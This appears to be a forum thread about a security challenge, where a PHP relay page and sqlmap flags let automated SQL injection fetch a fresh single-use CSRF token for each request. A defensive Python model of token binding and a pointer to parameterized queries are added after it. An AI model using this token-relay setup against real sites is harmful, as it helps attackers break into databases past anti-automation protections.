I'm doing a challenge where there is a webpage which allows SQL injection. Every request submitted needs a token which you retrieve from another webpage. The token is valid for a limited time and for one request only.
Is there a way to tell sqlmap to get the token before each test, maybe with a custom script?
KR, dk
Solved by creating a custom PHP page which gets the token from the site, manipulates it, and provides it in a format for sqlmap. Assuming token-generator.php replies with a plain text string only:
# bypass-csrf.php
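<?php
// Fetch a fresh token from the target's token endpoint (plain text response).
$t = file_get_contents('http://_site_/token-generator.php');
// Wrap it in a hidden form field named "token" so sqlmap can extract it from this page.
echo '<input type="hidden" name="token" value="' . $t . '">';
// Also emit the raw token after the form field.
echo $t;
?>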
sqlmap parameters: --csrf-url="http://127.0.0.1/bypass-csrf.php" --csrf-token="token"
dk
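A server-side view of the token scheme described in the question, as an added example that is not part of the original posts: a single-use, time-limited token only counts requests, so a token fetched by one client (such as the relay page above) is accepted from another unless it is bound to a session. The class, its method names and the session binding are assumptions made for illustration, not the challenge's code.

```python
import secrets
import time


class OneTimeTokens:
    """Constructed model of a single-use, time-limited request token."""

    def __init__(self, ttl=30.0, clock=time.monotonic):
        self.ttl = ttl
        self.clock = clock
        self._live = {}  # token -> (expiry, session id or None)

    def issue(self, session_id=None):
        token = secrets.token_urlsafe(32)
        self._live[token] = (self.clock() + self.ttl, session_id)
        return token

    def redeem(self, token, session_id=None):
        # pop() consumes the token even when a later check fails.
        entry = self._live.pop(token, None)
        if entry is None:
            return False  # unknown or already used
        expiry, bound_to = entry
        if self.clock() > expiry:
            return False  # expired
        # A token issued without a session is accepted from any client.
        return bound_to is None or secrets.compare_digest(bound_to, session_id or "")


def demo():
    now = [0.0]  # fake clock so expiry can be shown without sleeping
    store = OneTimeTokens(ttl=30.0, clock=lambda: now[0])
    out = {}
    t = store.issue()
    out["first_use"] = store.redeem(t)
    out["replay"] = store.redeem(t)
    t = store.issue()
    now[0] += 31
    out["expired"] = store.redeem(t)
    # Unbound token: fetched by one client, submitted by another.
    out["unbound_other_client"] = store.redeem(store.issue(), "client-B")
    # Bound token: only the session it was issued to may redeem it.
    out["bound_other_client"] = store.redeem(store.issue("client-A"), "client-B")
    out["bound_same_client"] = store.redeem(store.issue("client-A"), "client-A")
    return out


if __name__ == "__main__":
    print(demo())
```

Binding the token to a session narrows who can redeem it, but the injectable query still has to be fixed with parameterized statements; the token only limits how requests are submitted.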